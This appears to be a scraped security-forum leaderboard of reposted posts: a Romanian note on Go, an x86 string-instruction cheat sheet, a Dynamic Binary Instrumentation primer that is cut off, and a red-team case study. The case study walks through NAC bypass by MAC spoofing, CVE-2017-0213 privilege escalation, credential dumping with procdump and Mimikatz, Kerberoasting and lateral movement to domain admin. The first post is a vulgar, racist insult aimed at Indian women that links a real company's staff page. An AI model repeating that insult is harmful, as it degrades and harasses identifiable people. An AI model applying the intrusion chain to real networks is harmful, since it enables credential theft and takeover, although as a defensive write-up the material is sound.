Leaderboard
Popular Content
Showing content with the highest reputation on 08/07/18 in all areas
-
High class pussy in India.. rarely but maybe you find it here and there. Most majority is dirty, stinking, nasty, gypsy-like pussy in there. This is the kind of pussy they work with - https://www.hakunamatata.in/our-team/ that's "shit-in-pussy" class at best4 points
-
4 points
-
In mare parte e ceva mai sigur decat php(si mai rapid), e mai usor de dezvoltat applicatii web in el(si nu numai), ai pachete cam ca la python, ai control mai mare asupra functionalitatii(atunci cand scrii o aplicatie web), sintaxa mult mai simpla comparativ cu alte limbaje web, usor de invatat, suport destul de bun catre foarte bun pentru multithreading prin corutine si canale, suport nativ pentru template-uri(again pentru dezvoltare web), flexibilitate foarte mare, go nu este un limbaj web ci un limbaj de sistem care poate face si web(si o face foarte bine).(Astea sunt avantaje pe care le-am vazut eu dupa ~ un an si ceva de lucru cu go).1 point
-
Ophir Harpaz Cybercrime researcher at Trusteer, IBM Security. Beginner reverse engineer. Author of https://begin.re. Jul 23 A Summary of x86 String Instructions I have never managed to memorize all of x86 Assembly’s string instructions — so I wrote a cheat sheet for myself. Then I thought other people may find it useful too, and so this cheat sheet is now a blog post. This is what you’ll find here: The logic behind x86 string instructions. All the information from (1) squeezed into a table. A real-life example. Let’s go. Note: in order to understand this post, basic knowledge in x86 Assembly is required. I do not explain what registers are, how a string is represented in memory, etc. The Logic The Prefix + Instruction Combo First, let’s make the distinction between string instructions (MOVS, LODS, STOS, CMPS, SCAS) and repetition prefixes (REP, REPE, REPNE, REPZ, REPNZ). Repetition prefixes are meaningful only when preceding string instructions. They cause the specified instruction to repeat as long as certain conditions are met. These prefixes are also responsible for updating the relevant pointers after each iteration by the proper number of bytes. The possible combinations of prefixes and instructions are described in the following figure. Possible combinations of repetition prefixes (dark blue) and string instructions (light blue). Note: I exclude the INS, OUTS string instructions as I have rarely seen them. Termination Conditions REP: repeat until ECX equals 0. REPE, REPZ: repeat until ECX equals 0 or as long as the zero flag is set. The two prefixes mean exactly the same. REPNE, REPNZ: repeat until ECX equals 0 or as long as the zero flag is unset. The two prefixes mean exactly the same. String Instructions The instruction’s first three letters tell us what it does. The “S” in all instructions stands for — how surprising — “String”. Each of these instructions is followed by a letter representing the size to operate on: ‘B’ for byte, ‘W’ for word (2 bytes) and ‘D’ for double-word (4 bytes). Some string instructions operate on two strings: the string pointed to by ESI register (source string) and the string pointed to by EDI register (destination string): MOV moves data from the source string to the destination string. CMP compares data between the source and destination strings (in x86, comparison is basically subtraction which affects the EFLAGS register). Strings pointed to by the ESI, EDI registers. Other string instructions operate on only one string: LOD loads data from the string pointed to by ESI into EAX¹. STO stores data from EAX¹ into the string pointed to by EDI. SCA scans the data in the string pointed to by EDI and compares it to EAX¹ (again, along with affecting EFLAGS). Notes: 1. I use EAX to refer to AL for byte operations, AX for word operations and EAX for double-word operations. 2. After each iteration, ESI and EDI are incremented if the direction flag is set, and decremented otherwise. REPE CMPSB for Trump’s Rescue. Cheat Sheet Cheat sheet for x86 Assembly’s string instructions. A Real-Life Example Lately, we started doing CTFs at work (Trusteer, IBM Security). I stumbled upon a crack-me challenge from reversing.kr which contained the following function. Try to think about what this function is while we reverse engineer it together. The function receives three arguments and puts the third (arg_8) in ECX. If arg_8 equals zero, the function returns. Otherwise, we prepare the other registers for a string instruction: the first argument, arg_0, is moved into EDI and EAX is set to zero. Now, we have a REPNE SCASB: The string pointed to by EDI is scanned and each character is compared to zero, held by AL. This happens until ECX equals zero or until a null-terminator is scanned. Practically speaking, this instruction aims at finding the length of the destination string. If ECX ends up being zero (meaning a null terminator was not encountered), then ECX simply receives its original value back — arg_8. Otherwise, if the loop terminates due to a null character, ECX is set to the destination string’s length (including the null character). In other words, ECX is set to Min{ECX, len(destination_string)}. Now EDI is set to arg_0 and ESI is set to arg_4, and we have REPE CMPSB: Each character pointed to by EDI is compared to the corresponding one pointed to by ESI. This happens until ECX equals zero (namely, the destination string has been fully consumed) or until the zero flag is unset (namely, until a difference between the strings is detected). Then, the last character in the EDI string is compared to the last character in the ESI string: If they are equal — the function returns zero (ECX XORed with itself). If the character in [ESI-1] has a higher ASCII value than the one in [EDI-1] — the function returns 0xffffffff, or -1. This happens when the source string is lexicographically bigger than the destination string. Otherwise, The function returns not 0xfffffffe, which is 1. I reverse-engineered the function at work and then went to a colleague to see how he was doing. To my surprise, his IDA recognized this function as strncmp. My version didn’t. Argh. strncmp displays a nice usage of string instructions which makes it a nice function for practice. In any case, now you know how strncmp is implemented. Assembly Language Reverse Engineering Cheatsheet C Programming Language Like what you read? Give Ophir Harpaz a round of applause. From a quick cheer to a standing ovation, clap to show how much you enjoyed this story. Ophir Harpaz Cybercrime researcher at Trusteer, IBM Security. Beginner reverse engineer. Author of https://begin.re. Sursa: https://medium.com/@ophirharpaz/a-summary-of-x86-string-instructions-87566a28c20c1 point
-
Kerberoasting, exploiting unpatched systems – a day in the life of a Red Teamer May 21, 2018 Chetan Nayak Case Studies, Hacks, Penetration Testing, Security Testing, Tools 16 The Scope Recently, we conducted a red team assessment for a large enterprise client where the scenarios allowed were to either use the hardened laptop of the client or to try and connect our own laptop to the network (though they did have a Network Access Control system in place). This blog posts lists out our attempts to overcome the security controls, escalate our privileges, and move through the network, while at the same time ensuring that the SOC does not pick up our activities. For the purpose of this blog, I will be using a virtual name for the bank which is SPB-Groups. Preliminary Escalation: Day 1 We were given a system with Windows 7 x64 and a user named SPB-RANDOM-USER. The user was a non-admin and had extremely limited privileges on the network. PowerShell was blocked on all endpoints. They had Symantec AV and Windows Security Essentials (MSE) on the given system fully updated till date. Alternatively, Cisco NAC agents were also deployed to prevent unauthorized access by external laptops to the client network. All USB ports were disabled, Wi-Fi was enabled, but without any Internet access. So, the primary thing we started with was to find if there were any misconfiguration in the given system through which we could escalate our privileges to local admin. We couldn’t find any since most of the things were blocked by the group policy itself. We decided to split the whole task into two parts. My colleague started to analyze different ways to bypass the security mechanisms on the laptop while I started looking for ways to get access to the network via my personal laptop. Upon searching for patches using the below command: wmic qfe list full /format:htable > Updates.html 1 wmic qfe list full /format:htable > Updates.html we found that the client machine was vulnerable to Meltdown (CVE-2017-5715) and Windows COM Privilege Escalation (CVE-2017-0213). I quickly started searching for a POC for either of the exploits online. It was hard to get a hold of Meltdown since it was newly released and there was only a POC which stated whether the system was vulnerable or not. Using the POC to write a custom Meltdown exploit was the last thing we decided that we would do when everything else fails; since it would be pretty time consuming. However, I found a working binary for CVE-2017-0213 which I have uploaded here. The original source code of the exploit can be found here.. Now we had an exploit which could work, but there was a risk of AV detecting it and alerting it to the SOC which we obviously wanted to avoid. Before testing the exploits, we decided to disconnect the machine from their network and connect to our personal hotspot to upload the binaries of the exploit via HTTP. So, I modified the exploit to avoid AV detection but MSE was pretty strong to detect it no matter what how much we modified it. Now we were stuck with a laptop which we weren’t able to exploit and couldn’t connect it back to the network since it would send an alert of the AV detection. So, while my colleague was busy trying to find a way to bypass the AV, I tried to see if I could bypass the NAC security and get access to the network on my personal laptop. We had a Cisco IP Phone in the room where we were sitting which I then started messing around with, to see if I could get access to the LAN via that. I found that Authentication was enabled without any password. So, I disabled the authentication, changed the mode to Non-Secure and found the MAC address of the IP Phone. I then spoofed the MAC address on my personal Windows machine as below. Device Manager-> Network Adapters -> Ethernet Adapter -> Advanced -> Network Address -> Value Now before connecting my machine to the network I decided to change my hostname to something that matches the hostname schema of the company so that I can hide my laptop in plain sight in the proxy/firewall logs, something like SPB-ComputerName. I then connected the LAN cable and boom! I got an IP address and I was connected to their network. Next step was to find out where were the AD/DC, DNS Servers located. More important than finding the Forest DC was to find the key business Servers which contained the main business applications. Getting access to those meant getting access to the real crown jewels. Rogue Scanning: Day 2 Start of day 2 was disappointing. We returned to the client location only to find out that the primary system which was given to us had already connected back to the WiFi network of the office. This meant that the AV had already pushed up all the alerts that were raised during testing out the exploits a day back. Another problem was when we opened up the laptop, we saw that new patches had been installed and the system was rebooted automatically. Meltdown was patched now. We thought of just keeping the system aside and targeting the network from my personal computer. Instead of using Nmap or some other tool to scan, we decided to directly check the ARP cache and the netstat of the local system. We found a system with the naming convention SPB-DC08 and SPB-RDS30. Looking at the naming convention, we were able to identify that the first one was a DC and second was a Remote Desktop Server. This server RDS30 turned out to be the jump server which is used to connect to various server segments. We then used a PowerShell module named Get-ADComputer on our personal laptop to query the AD to get a list of computers from the AD itself. Doing this it will make sure only legitimate systems are queried and it would keep us away from scanning any decoys (if it were present) or atleast that was the hope. While the query was running, we thought of trying to connect via RDP to the RDS30 server with the default user we were given. We successfully connected to the machine. It was a Windows server 2008 with no AV installed. PowerShell was still blocked however. We had to get PowerShell up and running on this machine there if we wanted to proceed further. Most of the times the Windows AppLocker and the Group Policies block the PowerShell via the file hash. This means if I could use a custom binary to call the PowerShell DLL via winAPI, it would surely work. We thus used the PowerShDLL DLL to call the PowerShell DLL via CMD instead of directly calling the exe of the PowerShell via rundll32. With this we were easily able to bypass the Windows Group Policy App locker/Security policies and get a PowerShell Console. Once, we had PowerShell access in the domain itself, we started to enumerate User SPNs so as to perform Kerberoasting. We used the PowerShell script GetUserSPN.ps1 script to get a list of all user SPNs. Alternatively we thought that since patches are deployed on all systems via SCCM, if our previous system was vulnerable to the CVE-2017-0213, even this should be. And since there is no AV installed, we should be able to escalate our privilege. We moved the CVE binary from my system via RDP to the remote target, executed it and boom! I added a new user as a local admin for persistence which I can connect via Psexec.exe in case my existing user gets blocked since it had already triggered the AV previously. Persistence is a pretty important thing when you perform red team assessments. Now the next best step was to dump the credentials of the system. I used Procdump.exe as below. The aim was to use as low a number of malicious binaries as possible. Since Procdump is officially signed by Microsoft, there was a less chance of it getting sighted as malicious. Once a dump was created, we copied it back to our system and used Mimikatz to dump the creds locally. P.S.: The usernames, domain names, rootkeys, passwords, Authentication IDs which you can see below all have been modified to virtual ones. These are not real and only made to look real so as to make it relatable to the blog. Now we had access to around 8-9 credentials, most of them were normal users however and still we were far away from getting Domain Admins or Application Admins. But this was a good start. Now came the time when we decided to start moving laterally. We started enumerating other systems by guessing and querying the DC name we gathered previously. So, if one system name is RDS30, then there must be others numerically like rds01, rds02, rds03 and so on. So, I wrote a simple script to perform nslookup on the DC in a loop on all these machines to see which machines existed so that I can use the dumped credentials to move laterally throughout the organization. Also, we found a lot of users logged in with the domain/computer SPB-ERP, SPB-IT-HR, SPB-CC-DBADMIN other than the 8-9 compromised users above. This is when we realized that these are not real users. These were the Decoy users and if we would’ve used it, it would straight away raise an alert. So, we decided to use only users which were in the current domain, which looked legit by the naming convention or had logged in 2-3 days old only and by looking at the last login in Mimikatz dump. The Lateral Movement: Day 3 So, one thing we decided was that we won’t use the same creds to login to different machines. So, we started to login with different creds every time we RDP’d to other systems. For eg:- If we had users like SPB-user1, SPB-user2, SPB-user3 and machines like SPB-system1, SPB-system2, SPB-system3; we were moving like this: Login to SPB-system1 with SPB-user1 via RDP Login to SPB-system2 from SPB-system1 via SPB-user2 via RDP Login to SPB-system3 from SPB-system2 from SPB-system1 via SPB-user3 via RDP and so on We were basically 10 systems deep, had slow systems and lagging network connectivity but it kept everything quiet and outside the radar. Every system we logged in, we were taking a look at C:\Users to see if any new user had logged into the system recently (Change in date and time of the folder with username). We were only exploiting the system to dump creds, if any good users were there like DC-Admin, Support-Admin or SAP Admin. In this manner we reached around 60+ RDS systems gathering almost 90-100+ users logged in to the system. We finally found an RDS user and this user had access to most of the RDS System with a bit higher privileges than the normal users that we were using. We also found an excel sheet in one of the RDS Desktop’s C:\ drive with the name “Users info”. When I opened it up it contained usernames and passwords of all local admins of the RDS Systems. This was like hitting the jackpot! So almost all RDS Servers were pawned at this point. Now since we had access to almost all RDS servers, we had 2 options. Primary one being to wait for some admin to login to RDS, check every user folder and then again dump the password for that. Or we can simply run Bloodhound to find active session of users to different computers. Finally, being tired of doing this manually, we decided to use BloodHound. We downloaded the compiled dot net binary of BloodHound and ran it on one of the RDS server SPB-RDS46. And lo and behold. BloodHound gave us a list of active sessions of users and which system they are logged in into currently. P.S: The images are for representational purposes only After checking the details in bloodhound, we found that one of the VMWare admin was logged in into RDS53. We quickly jumped into that server only to find out that all updates had been installed on the system and it asked for a prompt to reboot the system to apply the updates. We postponed it for 10 minutes and saw the C:\Users folder that one SCCM admin had recently logged in to the system just 30 minutes ago. We quickly executed the same exploit CVE-2017-0213, ran Procdump and locally dumped the creds. And finally, we had found the VMWare admin as well as the SCCM Admin creds. Looks like the updates didn’t apply till the system was rebooted and the SCCM admin had logged in to run Microsoft Baseline Security Analyzer for the patches which was still running in the backend. We already had the VMWARE Server name with us with the Get-ADComputer PowerShell script that we ran previously. We RDP’d into the System with the VMWare Admin user and found a weblogin for the VMWare Management Server. We fired up the portal and tried to use the same creds we found previously, and we were now, the VMWare Admin and controlled all the virtualized systems within the Data Center. Updated (to make the statement more clear): We then proceeded to extract the SPN tickets using powershell that we had bypassed previously and also used Impacket for Kerberoasting and then brute forced the tickets to get the credentials. Using this we were able to get access to other systems using the service accounts and then dumped the credentials via procdump and got the creds for the DC-Admin and also the KTBTGT hash. The thing was during the last 2 days I had to move out to a different project and my colleague performed these steps to get the DC. Thus, I have explained only my part of the blogpost. We almost compromised all of the users connected to the servers, SCCM Admins, Few HR and IT personals, RDS Users and all the VMWare server Users. It was funny that how simple mistakes or missing even a simple patch can lead to this much destruction. Only if the NAC was implemented properly, all of this could’ve been impossible since the other system provided by the client was literally worthless with all the security they had applied. Recommendations The NAC was the main point of compromise here. Without the NAC agent installed, it shouldn’t have even assigned an IP address to my personal laptop. Also, the new user that was created and given to us for the activity had low-level access to a number of Jump Servers. This basically meant that there was an improper AD implemented under which new employees are assigned by default to a group that has access to servers. The users and the server segments should’ve been properly segregated and shouldn’t be allowed to RDP or connect to any servers unless there is an absolute business need for it. Another issue was that there was no endpoint protection beyond the anti-virus agent deployed. A UEBA tool or an EDR tool or even simply Sysmon with some open source analytical tool to analyze what’s happening in the backend would have helped pick up the activity possibly. And the main part was that there was no wdigest enabled on the servers where we dumped the credentials. If they had, then we would’ve only found the hash of the password and not the cleartext credentials in the dump. Also when we pwned the DC via Kerberoasting, we had to crack the credentials from the tickets we captured. And the passwords used by the employees were something that could be easily cracked using a wordlist. So complex passwords for service accounts is still a very important security control Additionally, monitoring for Kerberoasting attacks is now strongly recommended. About Latest Posts Follow me at Chetan Nayak OSCP | Security Researcher at Network Intelligence Chetan Nayak is a security researcher in Network Intelligence. He has a keen interest in Malware development, hacking networks, RF devices and threat hunting. Sursa: http://niiconsulting.com/checkmate/2018/05/kerberoasting-exploiting-unpatched-systems-a-day-in-the-life-of-a-red-teamer/1 point
-
Dynamic Binary Instrumentation Primer Jul 25, 2018 • By rui Dynamic Binary Instrumentation (DBI) is a method of analyzing the behavior of a binary application at runtime through the injection of instrumentation code - Uninformed 2007 Introduction The purpose of this post is to document my dive into the “world” of Dynamic Binary Instrumentation. I’ll cover some of the most well known and used DBI frameworks. That is Pin, DynamoRIO, and Frida. From these three I’ll mainly focus on Pin. There are other DBI frameworks that I won’t touch at all, like Valgrind, Triton (uses Pin), QDBI, BAP, Dyninst, plus many others. You might want to have a look at them. Some are more mature, some are less mature. Some have more features, some have fewer features. You’ll have to do some research yourself and see which ones fit your needs. Even though Valgrind is one of the most widely known, and used DBI frameworks, it’s only available for Linux. So, I won’t touch it at all. In my vulnerability hunting adventures I’ve been focused on Windows, and in fact, if you want to take the code I’ll present here and build it on Linux it should be pretty straightforward. While the opposite wouldn’t be true. The reason being is that building Pin or DynamoRIO on Windows can be a bit frustrating. Especially if you aren’t motivated to do so. I’m not an expert in this area (DBI), however since the beginning of the year that I’ve been doing some experiments around Fuzzing, and I’ve read a lot about the subject. Hence, I’ll try to document some of what I learned for future reference. Possibly you’ll also find it useful. Note that my goal was to write a reference and not a tutorial. The funny part is that I actually thought about doing “something” with Pin, or DynamoRIO, while trying to do some browser Heap Spraying. Basically, I wanted to monitor the memory allocations my code was producing. While I could do it inside a debugger I thought, “why not use a DBI framework? Maybe I can learn something”. After all, debuggers are slow. Until today, I’m still unsure if I prefer to use WinDbg or Pin for this anyway. Instrumentation According to Wikipedia, instrumentation refers to an ability to monitor or measure the level of a product’s performance, to diagnose errors and to write trace information. Programmers implement instrumentation in the form of code instructions that monitor specific components in a system (…). When an application contains instrumentation code, it can be managed using a management tool. Instrumentation is necessary to review the performance of the application. Instrumentation approaches can be of two types: Source instrumentation and binary instrumentation. As stated above, there are two types of instrumentation. Source instrumentation, which is not possible if you don’t have the source code of the software application. And binary instrumentation, which can be used with any software application assuming we can execute it. It turns out that most of the programs you run on a Windows operating system are closed source. Which means, in this post, I’ll be “talking” only about binary instrumentation. Often called Dynamic Binary Instrumentation, or Dynamic Binary Modification. Because words take too long, usually people use the acronym DBI, as I already did above. In a one-line statement, Dynamic Binary Instrumentation is a technique that involves injecting instrumentation code into a running process. The instrumentation code will be entirely transparent to the application that it’s been injected to. With a DBI framework, we can analyze the target binary execution step by step. However, note that the analysis only applies to executed code. Dynamic Program Analysis There are two types of program analysis, static, and dynamic. We perform static analysis without running a computer program. While we perform dynamic analysis when we run a computer program. Citing Wikipedia again, Dynamic program analysis is the analysis of computer software that is performed by executing programs on a real or virtual processor. For dynamic program analysis to be effective, the target program must be executed with sufficient test inputs to produce interesting behavior. Use of software testing measures such as code coverage helps ensure that an adequate slice of the program’s set of possible behaviors has been observed. Dynamic binary modification tools, like the frameworks mentioned earlier, introduce a layer between a running program and the underlying operating system. Providing a unique opportunity to inspect and modify user-level program instructions while a program executes. These systems are very complex internally. However, all the complexity is masked in an API that allows any user to quickly build a multitude of tools to aid software analysis. And that’s what I’ll try to show in this post, by sharing some code I wrote while playing with some DBI frameworks. There are many reasons for us to observe and modify the runtime behavior of a computer program. Software and/or hardware developers, system engineers, bug hunters, malware analysts, end users, and so on. All of them will have their own reasons. DBI frameworks provide access to every executed user-level instruction. Besides a potentially small runtime and memory overhead, the program will run identically to a native execution. You can say that the main advantage of static analysis is that it ensures 100% code coverage. With dynamic analysis, to ensure a high code coverage we’ll need to run the program many times, and with different inputs so the analysis takes different code paths. However, in some cases, the software applications are so big that’s too costly to perform static analysis. I would say, one complements the other. Even though static analysis is very boring, and dynamic analysis is (very) fun. As I mentioned before, DBI frameworks operate directly in binaries/executables. We don’t need the source code of the program. We don’t need to (re)compile or (re)link the program. Obviously, this is an major advantage, as it allows us to analyze proprietary software. A dynamic binary system operates at the same time as the “guest” program executes while performing all the requested/required modifications on the fly. This dynamic approach can also handle programs that generate code dynamically (even though it imposes a big engineering challenge), that is, self-modifying code. If you “google” a bit you’ll actually find multiple cases where DBI frameworks are/were used to analyze malware with self-modifying code. As an example, check this presentation from last year’s blackhat Europe. Or, this post about how to unpack Skype with Pin. DBI frameworks are daily used to solve computer architecture problems, being heavily used in software engineering, program analysis, and computer security. Software engineers want to deeply understand the software they develop, analyze its performance, and runtime behavior in a systematic manner. One common use of DBI frameworks is emulating new CPU instructions. Since the dynamic binary system has access to every instruction before executing it, hardware engineers can actually use these systems to test new instructions that are currently unsupported by the hardware. Instead of executing a specific instruction, they can emulate the new instruction behavior. The same approach can be used to replace faulty instructions with the correct emulation of the desired behavior. Anyway, from a computer security perspective, a DBI system can be used for flow analysis, taint analysis, fuzzing, code coverage, test cases generation, reverse engineering, debugging, vulnerability detection, and even crazy things like patching of vulnerabilities, and automated exploit development. There are two main ways of using a dynamic binary system. The first, and eventually most common, in computer security at least, is executing a program from start to finish under the control of the dynamic binary system. We use it when we want to achieve full system simulation/emulation because full control and code coverage are desired. The second, we may just want to attach to an already running program (exactly in the same way a debugger can be attached, or detached, from a running program). This option might be useful if we are interested in figuring out what a program is doing in a specific moment. Besides, most of the DBI frameworks have three modes of execution. Interpretation mode, probe mode, and JIT mode. The JIT (just-in-time) mode is the most common implementation, and most commonly used mode even when the DBI system supports more than one mode of execution. In JIT mode the original binary/executable is actually never modified or executed. The binary is seen as data, and a modified copy of the binary is generated in a new memory area (but only for the executed parts of the binary, not the whole binary). Is this modified copy that’s then executed. In interpretation mode, the binary is also seen as data, and each instruction is used as a lookup table of alternative instructions that have the corresponding functionality (as implemented by the user). In probe mode, the binary is actually modified by overwriting instructions with new instructions. even though this results in a low run-time overhead it’s very limited in certain architectures (like x86). Whatever the execution mode, once we have control over the execution of a program, through a DBI framework, we then have the ability to add instrumentation into the executing program. We can insert our code, instrumentation, before and after blocks of code, or even replace them completely. We can visualize how it works in the diagram below. Also, there are different types of granularity. Instruction level Basic block level Function level The granularity choice, as you can guess, will allow you to have more, or less, control over the execution of a program. Obviously, this will have an impact on performance. Also, note that instrumenting a program in its totality is unpractical in most cases. Performance You might be thinking what’s the performance impact of modifying a running program on the fly as described above. Well, I have a very limited experience to answer this question. However, after reading multiple papers, articles, and presentations, the overhead commonly observed depends on a random number of factors really. Anyway, as kind of expected, the modifications the user implements are responsible for the majority of the overhead. The number 30% is apparently accepted as a common average number observed. Can’t really remember where I read this to mention the source, but I definitely read it somewhere. You’ll find it for sure in the References section anyway. Obviously, one of the first decisions that you, as a DBI user, will have to make is to decide the amount of code coverage required by your needs and the amount of performance overhead you’ll be able to accept as reasonable. Pin Pin is a DBI framework developed by Intel Corp. It allows us to build program analysis tools known as Pintools, for Windows, Linux, and OSX. We can use these tools to monitor, modify, and record the behavior of a program while it is running. Pin is proprietary software. However, we can download and use it free of charge for non-commercial use. Besides the documentation and the binaries, Pin also includes source code for a large collection of sample Pintools. These are invaluable examples that we must consider, and definitely read, before developing any Pintool. In my opinion, Pin is the easiest DBI framework to use. At least I felt it was easier to dive into it’s API than into the DynamoRIO one. Even though I didn’t spend too much time trying to learn other APIs besides these two, I had a look at a few others. Like Valgrind, Triton, Dyninst, and Frida. The choice will always depend on what you intend to do, honestly. If you want to create a commercial tool and distribute binary versions of it, Pin won’t be a good choice. If that’s not the case, Pin might be a very good choice. Mainly because based on the tests I did, Pin is stable and reliable. I had some issues running some programs under some DBI frameworks. Mainly big programs, like Office suites, games, and AV engines. Some DBI frameworks were failing miserably, some even with small applications. Pin setup (Windows) Pin setup in Linux is quite straightforward. However, on Windows systems, it can be a bit tricky. See below how to quickly set it up to get started in case you want to try the samples I’ll present in this post. Get the latest Pin version from here, and unpack it on your C:\ drive, or wherever you want. For simplicity, I usually use C:\pin. I advise you to do the same if you plan to follow some of the experiments presented in this post. The Pin zip file includes a big collection of sample Pintools under source/tools. The API is very easy to read and understand as we’ll see. By the end of this post you should be able to read the source code of most of the samples without any struggle (well, kind of). I like Visual Studio, and I’ll be using it to build “every” tool mentioned in this post. There’s one Pintool sample that’s almost ready to be built with Visual Studio. You’ll have to adjust only a couple of settings. However, I didn’t want to manually copy and rename files every time I wanted to create a new Pintool project. So I created a sample project already tweaked, available here that you can place under C:\pin\source\tools, together with the following python script. The script was inspired by Peter’s script. However, since the way newer versions of Visual Studio save the settings has changed I had to re-write/create a completely new script. So, every time you want to build a new Pintool with Visual Studio, just do: cd\ cd pin python create_pintool_project.py -p <name_of_your_project> You can then just click the project’s solution file and build your Pintool with Visual Studio without any pain. I used Visual Studio Professional 2015, but it will also work with Visual Studio 2017. I did a couple of builds with Visual Studio 2017 Enterprise without any issue. Pin Visual Studio integration We can add our Pintools as external tools to Visual Studio. This will allow us to run, and test, our Pintool without using the command line all the time. The configuration is very simple. From the Tools menu, select External tools and a dialog box will appear. Click the Add button and fill out the text input boxes according to the image below. In the Title, input text box enter whatever you want. In the Command input text box enter the full path to your pin.exe, so c:\pin\pin.exe in case you installed it under c:\pin. In the Arguments, you must include all the arguments you want to pass to your Pintool. You’ll need at least the ones specified in the image above. The -t is to specify where your Pintool is, and after the -- is the target program you want to instrument. After the setup, you can simply run your Pintool from the Tools menu as shown in the image below. Click ok, and enjoy. The Output window of Visual Studio will show whatever the output your Pintool is writing to stdout. DynamoRIO DynamoRIO is another DBI framework originally developed in a collaboration between HP’s Dynamo optimization system and the Runtime Introspection and Optimization (RIO) research group at MIT. It allows us to build program analysis tools known as clients, for Windows, and Linux. We can use these tools to monitor, modify, and record the behavior of a program while it is running. DynamoRIO was first released as a proprietary binary toolkit in 2002 and was later open-sourced with a BSD license in 2009. Like Pin, it also comes with source code for multiple client samples. These are invaluable examples to get us started and playing with its API. DynamoRIO is a runtime code manipulation system which allows code transformation on any part of the program as the program runs. It works as an intermediate platform between applications and operating system. As I said before, I didn’t find DynamoRIO’s API the most friendly and easy to use. However, if you plan to make a commercial version, and/or distribute binary versions, DynamoRIO might be the best option. One of its advantages is the fact that it is BSD licensed, which means free software. If that’s important for you, go with DynamoRIO. Also note that’s commonly accepted that DynamoRIO is faster than Pin, check the References section. However, is equally accepted that Pin is more reliable than DynamoRIO, which I also personally experienced when running big software programs. DynamoRIO setup (Windows) To install DynamoRIO on Windows simply download the latest Windows version from here (DynamoRIO-Windows-7.0.0-RC1.zip at the time of this writing), and similarly to what we did with Pin just unzip it under C:\dynamorio. To build your own DynamoRIO projects on Windows it can be a bit tricky though. You can try to follow the instructions here or the instructions here or, to avoid frustration, just… use my DynamoRIO Visual Studio template project. As I said before, I like Visual Studio. I created a sample project already tweaked with all the includes and libs required (assuming you unzipped DynamoRIO in the directory I mentioned before), available here. Then, more or less the same way we did with Pin, also download the following python script. Since the file structure of the project is a bit different I couldn’t use the script I wrote before to clone a project, and I had to create a new one specific to DynamoRIO. So, every time you want to build a new DynamoRIO client with Visual Studio, just do: python create_dynamorio_project.py -p <name_of_your_project> The command above assumes that both the Python script and the template project mentioned above are in the same folder. You can then just click the project’s solution file and build your DynamoRIO client with Visual Studio without any pain. I used Visual Studio Professional 2015, but it will also work with Visual Studio 2017. I did a couple of builds with Visual Studio 2017 Enterprise without any issue. DynamoRIO Visual Studio integration We can also integrate DynamoRIO with Visual Studio, exactly the same way we did with Pin. Since the setup process is exactly the same, I’ll only leave here the screenshot below and you can figure how to do the rest. Frida Frida is a DBI framework developed mainly by Ole. It became very popular among the “mobile” community and gained a considerable group of contributors (now sponsored by NowSecure). Frida supports OSX, Windows, Linux, and QNX, and has an API available for multiple languages, like Python, C#, Swift, Qt\QML and C. Just like the DBI frameworks mentioned above, we can use Frida together with scripts to monitor, modify, and record the behavior of a program while it is running. Frida is free (free as in free beer) and is very easy to install (see below). There are also many usage examples online that we can use to get started. Frida injects Google’s V8 engine into a process. Then, Frida core communicates with Frida’s agent (process side) and uses the V8 engine to run the JavaScript code (creating dynamic hooks). Frida’s API has two main parts. The JavaScript API and the bindings API. I didn’t dive too deep into them and just used the most popular I believe. That is the JavaScript API. I found it easy to use, very flexible, and I could use it to quickly write some introspection tools. Even though Pin and DynamoRIO are the “main” DBI frameworks, and most mature, Frida has some advantages. As mentioned above, it has bindings for other/more languages, and rapid tool development is a reality. It also has some disadvantages, less maturity, less documentation, less granularity than other frameworks, and consequently lack of some functionalities. Frida setup (Windows) Frida’s setup is very easy. Just download https://bootstrap.pypa.io/get-pip.py and then run: python get-pip.py And, to actually install Frida type the following. cd\ cd Python27\Scripts pip.exe install frida And that’s it, you are ready to go. Yes, you have to install Python before the steps above. However, I don’t know anyone that doesn’t have Python installed so I just assume it’s already there. Generic DBI usage Before diving into some code, I’ll try to document in this section generic ways of using some of the DBI frameworks I mentioned before. More precisely Pin, and DynamoRIO. As mentioned before, the most common execution mode in a DBI system is the JIT (just-in-time-compiler). The JIT compiler will create a modified copy of chunks of instructions just before executing them, and these will be cached in memory. This mode of execution is the default in most of the DBI frameworks I had a look and is also generally accepted as the most robust execution model. Also, as mentioned before, there are two main methods to control the execution of a program. The first is to run the entire program under the control of the DBI framework. The second is to attach to a program already running. Just like a debugger. Below is the standard way to run a program under the control of a DBI system. Our target/guest application is not directly launched from the command line. Instead, it is passed as an argument to the DBI system. The DBI system initializes itself, and then launches the program under its control and modifies the program according to the plug-in. The plug-in contains the actual user-defined code, that is our instrumentation code. The plug-in on Pin it’s called Pintool, on DynamoRIO it’s called client, on Frida I believe it’s simply called script? PIN JIT mode. pin.exe <pin args> -t <pintool>.dll <pintool args> -- target_program.exe <target_program args> PIN Probe mode. pin.exe -probe <pin args> -t <pintool>.dll <pintool args> -- target_program.exe <target_program args> DynamoRIO JIT mode. drrun.exe -client <dynamorio client>.dll 0 "" target_program.exe <target_program args> DynamoRIO Probe mode. drrun.exe -mode probe -client <dynamorio client>.dll 0 "" target_program.exe <target_program args> As we can see above, the way we launch Pin and DynamoRIO it is not that different. In Linux systems, it’s pretty much the same (yes, remove the .exe, and substitute the .dll by .so and that’s it). Obviously, there are many other options that can be passed on the command line besides the ones shown above. For a full list check the help/man pages. Above are just the required options for reference. Frida is a bit different, and we’ll see ahead how to use it. If you want to attach to a running process, you can do it with Pin. However, as of today, attaching to a process with DynamoRIO is not supported. However, there are two methods of running a process under DynamoRIO in Windows. You can read more about it here. With Pin you can simply attach to a process by using the -pid argument as shown below. pin.exe -pid <target pid> <other pin args> -t <pintool>.dll <pintool args> User defined modifications Despite the DBI we are using, each DBI framework provides an API that we can use to specify how we modify the target/guest program. The abstraction introduced by the API is used together with code usually written in C, or C++ (or even JavaScript, or Swift in the case of Frida) to create a plug-in (in the form of a shared library as we saw above) which will then be “injected” in the running target/guest program by the DBI system. It will run on the same address space of the target/guest program. This means that in order for us to use a DBI system, we need not only to know how to launch a target/guest program, as illustrated above but also be familiar and understand the API exported by the framework we want to use. Unfortunately, the APIs of these multiple frameworks are very different. However, as will see the general concepts apply to most of them. As I mentioned before, I’ll be focusing mainly in Pin. I’ll also try to recreate more or less the same functionality with DynamoRIO and Frida, so we will also get a bit familiar with their API somehow. Note that the API coverage won’t be by any means extensive. I advise you to check each DBI framework API documentation if you want to know more. By following this post you’ll simply get a sense of what’s available in the API, eventually limited to the use case scenario I chose. The idea behind any API is to hide the complexity of certain operations from the user, without removing any power to perform any task (including complex tasks). We can usually say that the easier is to use the 